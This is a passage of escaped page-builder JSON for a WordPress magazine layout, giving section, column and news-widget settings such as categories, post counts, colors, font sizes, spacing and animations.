0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"48mal4x\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.960\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"x20xpc5\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"5\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#ea7441\",\"category_bg_hover_color\":\"#ea7441\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"y4m8rgg\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"6\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#e5e100\",\"category_bg_hover_color\":\"#e5e100\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_color1\":\"rgba(255,255,255,0.5)\",\"post_icon_color2\":\"rgba(255,255,255,0.5)\",\"post_icon_size\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"pzcs9rp\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"content_width\":{\"unit\":\"px\",\"size\":\"1170\"},\"gap\":\"no\",\"structure\":\"20\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":0,\"bottom\":\"50\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"gifizg0\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":\"65.004\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"in485g7\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"structure\":\"20\",\"section_sticky_element\":\"\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"sqh26zs\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":\"48.082\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"ni7iq5b\",\"elType\":\"widget\",\"settings\":{\"section_magzma_post_list\":\"\",\"posts_per_page\":\"1\",\"category\":[\"8\"],\"loop_infinite_class\":\"loop-infinte-list-1\",\"section_magzma_post_list_1_typhography_title\":\"\",\"post_icon_size_post_list_1_tablet\":{\"unit\":\"px\",\"size\":18},\"post_icon_size_post_list_1_mobile\":{\"unit\":\"px\",\"size\":18},\"post_icon_padding_post_list_1_tablet\":{\"unit\":\"px\",\"size\":10},\"post_icon_padding_post_list_1_mobile\":{\"unit\":\"px\",\"size\":10},\"post_list_1_view_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_view_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_view_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"post_list_1_view_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"post_list_1_view_font_weight_tablet\":\"600\",\"post_list_1_view_font_weight_mobile\":\"600\",\"typhography_category_post_list_1_background_color\":\"#385c7b\",\"post_list1_category_background_hov_color\":\"#385c7b\",\"post_list_1_category_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_category_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_category_font_size_tablet\":{\"unit\":\"px\",\"size\":12},\"post_list_1_category_font_size_mobile\":{\"unit\":\"px\",\"size\":12},\"post_list_1_category_font_weight_tablet\":\"600\",\"post_list_1_category_font_weight_mobile\":\"600\",\"typhography_title_post_list_1_hov_color\":\"#aaaaaa\",\"post_list_1_title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.25},\"post_list_1_title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.25},\"post_list_1_title_font_size\":{\"unit\":\"px\",\"size\":\"24\"},\"post_list_1_title_font_size_tablet\":{\"unit\":\"px\",\"size\":24},\"post_list_1_title_font_size_mobile\":{\"unit\":\"px\",\"size\":24},\"post_list_1_title_font_weight_tablet\":\"600\",\"post_list_1_title_font_weight_mobile\":\"600\",\"post_list1_meta_title_hov_color\":\"#aaaaaa\",\"post_list_1_meta_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"post_list_1_meta_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"post_list_1_meta_font_weight_tablet\":\"600\",\"post_list_1_meta_font_weight_mobile\":\"600\",\"post_list_1_excerpt_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_excerpt_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_excerpt_font_size_tablet\":{\"unit\":\"px\",\"size\":18},\"post_list_1_excerpt_font_size_mobile\":{\"unit\":\"px\",\"size\":18},\"post_list_1_excerpt_word\":\"10\",\"use_read_more_post_list_1\":\"\",\"post_list1_read_more_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list1_read_more_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list1_read_more_font_size_tablet\":{\"unit\":\"px\",\"size\":18},\"post_list1_read_more_font_size_mobile\":{\"unit\":\"px\",\"size\":18},\"post_list1_read_more_font_weight_tablet\":\"400\",\"post_list1_read_more_font_weight_mobile\":\"400\",\"section_magzma_post_list_1_column_control\":\"\",\"horizontal_use\":\"left\",\"width\":\"600\",\"height\":\"395\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_list_style_1_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_list_style_1_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_post_list_animation_control\":\"\",\"animate\":\"fadeIn\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-post-list-1\"}],\"isInner\":true},{\"id\":\"feegelf\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":\"51.918\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[],\"isInner\":true}],\"isInner\":true},{\"id\":\"wnhjaaz\",\"elType\":\"widget\",\"settings\":{\"section_magzma_post_list\":\"\",\"posts_per_page\":\"4\",\"category\":[\"10\"],\"loop_infinite_class\":\"loop-infinte-list-1\",\"section_magzma_post_list_1_typhography_title\":\"\",\"post_icon_color1_post_list_1\":\"rgba(0,0,0,0.5)\",\"post_icon_color2_post_list_1\":\"rgba(0,0,0,0.5)\",\"post_icon_size_post_list_1_tablet\":{\"unit\":\"px\",\"size\":18},\"post_icon_size_post_list_1_mobile\":{\"unit\":\"px\",\"size\":18},\"post_icon_padding_post_list_1_tablet\":{\"unit\":\"px\",\"size\":10},\"post_icon_padding_post_list_1_mobile\":{\"unit\":\"px\",\"size\":10},\"post_list_1_view_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_view_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_view_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"post_list_1_view_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"post_list_1_view_font_weight_tablet\":\"600\",\"post_list_1_view_font_weight_mobile\":\"600\",\"typhography_category_post_list_1_background_color\":\"#00c5b5\",\"post_list1_category_background_hov_color\":\"#00c5b5\",\"post_list_1_category_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_category_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_category_font_size_tablet\":{\"unit\":\"px\",\"size\":12},\"post_list_1_category_font_size_mobile\":{\"unit\":\"px\",\"size\":12},\"post_list_1_category_font_weight_tablet\":\"600\",\"post_list_1_category_font_weight_mobile\":\"600\",\"typhography_title_post_list_1_hov_color\":\"#aaaaaa\",\"post_list_1_title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.25},\"post_list_1_title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.25},\"post_list_1_title_font_size\":{\"unit\":\"px\",\"size\":\"24\"},\"post_list_1_title_font_size_tablet\":{\"unit\":\"px\",\"size\":24},\"post_list_1_title_font_size_mobile\":{\"unit\":\"px\",\"size\":24},\"post_list_1_title_font_weight_tablet\":\"600\",\"post_list_1_title_font_weight_mobile\":\"600\",\"post_list1_meta_title_hov_color\":\"#00c5b5\",\"post_list_1_meta_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"post_list_1_meta_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"post_list_1_meta_font_weight_tablet\":\"600\",\"post_list_1_meta_font_weight_mobile\":\"600\",\"post_list_1_excerpt_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_excerpt_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_excerpt_font_size_tablet\":{\"unit\":\"px\",\"size\":18},\"post_list_1_excerpt_font_size_mobile\":{\"unit\":\"px\",\"size\":18},\"post_list_1_excerpt_word\":\"10\",\"use_read_more_post_list_1\":\"\",\"post_list1_read_more_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list1_read_more_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list1_read_more_font_size_tablet\":{\"unit\":\"px\",\"size\":18},\"post_list1_read_more_font_size_mobile\":{\"unit\":\"px\",\"size\":18},\"post_list1_read_more_font_weight_tablet\":\"400\",\"post_list1_read_more_font_weight_mobile\":\"400\",\"section_magzma_post_list_1_column_control\":\"\",\"horizontal_use\":\"left\",\"width\":\"600\",\"height\":\"395\",\"horizontal_col_select\":\"column-2\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"use_padding\":\"use\",\"padding_size_list_style_1\":{\"unit\":\"px\",\"size\":\"10\"},\"padding_size_list_style_1_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_list_style_1_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_post_list_animation_control\":\"\",\"animate\":\"fadeIn\",\"_section_style\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-5\",\"bottom\":\"0\",\"left\":\"-5\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-post-list-1\"},{\"id\":\"3j25kle\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"structure\":\"20\",\"section_sticky_element\":\"\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"q18cnb8\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"o6ou2yp\",\"elType\":\"widget\",\"settings\":{\"section_magzma_post_list\":\"\",\"posts_per_page\":\"4\",\"offset\":\"1\",\"category\":[\"5\"],\"loop_infinite_class\":\"loop-infinte-list-1\",\"section_magzma_post_list_1_typhography_title\":\"\",\"post_icon_color1_post_list_1\":\"rgba(0,0,0,0.6)\",\"post_icon_color2_post_list_1\":\"rgba(0,0,0,0.6)\",\"post_icon_size_post_list_1_tablet\":{\"unit\":\"px\",\"size\":18},\"post_icon_size_post_list_1_mobile\":{\"unit\":\"px\",\"size\":18},\"post_icon_padding_post_list_1_tablet\":{\"unit\":\"px\",\"size\":10},\"post_icon_padding_post_list_1_mobile\":{\"unit\":\"px\",\"size\":10},\"use_view_post_list_1\":\"\",\"post_list_1_view_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_view_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_view_font_size\":{\"unit\":\"px\",\"size\":\"10\"},\"post_list_1_view_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"post_list_1_view_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"post_list_1_view_font_weight_tablet\":\"600\",\"post_list_1_view_font_weight_mobile\":\"600\",\"typhography_category_post_list_1_background_color\":\"#ea7441\",\"post_list1_category_background_hov_color\":\"#ea7441\",\"post_list_1_category_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_category_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_category_font_size\":{\"unit\":\"px\",\"size\":\"10\"},\"post_list_1_category_font_size_tablet\":{\"unit\":\"px\",\"size\":12},\"post_list_1_category_font_size_mobile\":{\"unit\":\"px\",\"size\":12},\"post_list_1_category_font_weight_tablet\":\"600\",\"post_list_1_category_font_weight_mobile\":\"600\",\"typhography_title_post_list_1_hov_color\":\"#aaaaaa\",\"post_list_1_title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.25},\"post_list_1_title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.25},\"post_list_1_title_font_size\":{\"unit\":\"px\",\"size\":\"14\"},\"post_list_1_title_font_size_tablet\":{\"unit\":\"px\",\"size\":24},\"post_list_1_title_font_size_mobile\":{\"unit\":\"px\",\"size\":24},\"post_list_1_title_font_weight\":\"700\",\"post_list_1_title_font_weight_tablet\":\"600\",\"post_list_1_title_font_weight_mobile\":\"600\",\"use_meta_post_list_1\":\"\",\"post_list1_meta_title_hov_color\":\"#aaaaaa\",\"post_list_1_meta_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"post_list_1_meta_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"post_list_1_meta_font_weight_tablet\":\"600\",\"post_list_1_meta_font_weight_mobile\":\"600\",\"use_excerpt_post_list_1\":\"\",\"post_list_1_excerpt_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_excerpt_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_excerpt_font_size_tablet\":{\"unit\":\"px\",\"size\":18},\"post_list_1_excerpt_font_size_mobile\":{\"unit\":\"px\",\"size\":18},\"post_list_1_excerpt_word\":\"10\",\"use_read_more_post_list_1\":\"\",\"post_list1_read_more_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list1_read_more_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list1_read_more_font_size\":{\"unit\":\"px\",\"size\":\"15\"},\"post_list1_read_more_font_size_tablet\":{\"unit\":\"px\",\"size\":18},\"post_list1_read_more_font_size_mobile\":{\"unit\":\"px\",\"size\":18},\"post_list1_read_more_font_weight_tablet\":\"400\",\"post_list1_read_more_font_weight_mobile\":\"400\",\"section_magzma_post_list_1_column_control\":\"\",\"horizontal_use\":\"left\",\"width\":\"600\",\"height\":\"395\",\"horizontal_col_select\":\"column-2\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"use_padding\":\"use\",\"padding_size_list_style_1\":{\"unit\":\"px\",\"size\":\"10\"},\"padding_size_list_style_1_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_list_style_1_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_post_list_animation_control\":\"\",\"animate\":\"fadeIn\",\"_section_style\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"-15\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-post-list-1\"}],\"isInner\":true},{\"id\":\"wg2jk1s\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"e37o4qh\",\"elType\":\"widget\",\"settings\":{\"section_magzma_post_list\":\"\",\"posts_per_page\":\"1\",\"category\":[\"5\"],\"loop_infinite_class\":\"loop-infinte-list-1\",\"section_magzma_post_list_1_typhography_title\":\"\",\"post_icon_size_post_list_1_tablet\":{\"unit\":\"px\",\"size\":18},\"post_icon_size_post_list_1_mobile\":{\"unit\":\"px\",\"size\":18},\"post_icon_padding_post_list_1_tablet\":{\"unit\":\"px\",\"size\":10},\"post_icon_padding_post_list_1_mobile\":{\"unit\":\"px\",\"size\":10},\"use_view_post_list_1\":\"\",\"post_list_1_view_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_view_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_view_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"post_list_1_view_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"post_list_1_view_font_weight_tablet\":\"600\",\"post_list_1_view_font_weight_mobile\":\"600\",\"typhography_category_post_list_1_background_color\":\"#ea7441\",\"post_list1_category_background_hov_color\":\"#ea7441\",\"post_list_1_category_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_category_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_category_font_size_tablet\":{\"unit\":\"px\",\"size\":12},\"post_list_1_category_font_size_mobile\":{\"unit\":\"px\",\"size\":12},\"post_list_1_category_font_weight_tablet\":\"600\",\"post_list_1_category_font_weight_mobile\":\"600\",\"typhography_title_post_list_1_hov_color\":\"#aaaaaa\",\"post_list_1_title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.25},\"post_list_1_title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.25},\"post_list_1_title_font_size\":{\"unit\":\"px\",\"size\":\"24\"},\"post_list_1_title_font_size_tablet\":{\"unit\":\"px\",\"size\":24},\"post_list_1_title_font_size_mobile\":{\"unit\":\"px\",\"size\":24},\"post_list_1_title_font_weight_tablet\":\"600\",\"post_list_1_title_font_weight_mobile\":\"600\",\"post_list1_meta_title_hov_color\":\"#aaaaaa\",\"post_list_1_meta_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"post_list_1_meta_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"post_list_1_meta_font_weight_tablet\":\"600\",\"post_list_1_meta_font_weight_mobile\":\"600\",\"post_list_1_excerpt_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_excerpt_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_excerpt_font_size_tablet\":{\"unit\":\"px\",\"size\":18},\"post_list_1_excerpt_font_size_mobile\":{\"unit\":\"px\",\"size\":18},\"post_list_1_excerpt_word\":\"10\",\"use_read_more_post_list_1\":\"\",\"post_list1_read_more_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list1_read_more_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list1_read_more_font_size_tablet\":{\"unit\":\"px\",\"size\":18},\"post_list1_read_more_font_size_mobile\":{\"unit\":\"px\",\"size\":18},\"post_list1_read_more_font_weight_tablet\":\"400\",\"post_list1_read_more_font_weight_mobile\":\"400\",\"section_magzma_post_list_1_column_control\":\"\",\"horizontal_use\":\"left\",\"width\":\"600\",\"height\":\"328\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_list_style_1_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_list_style_1_mobile\":{\"unit\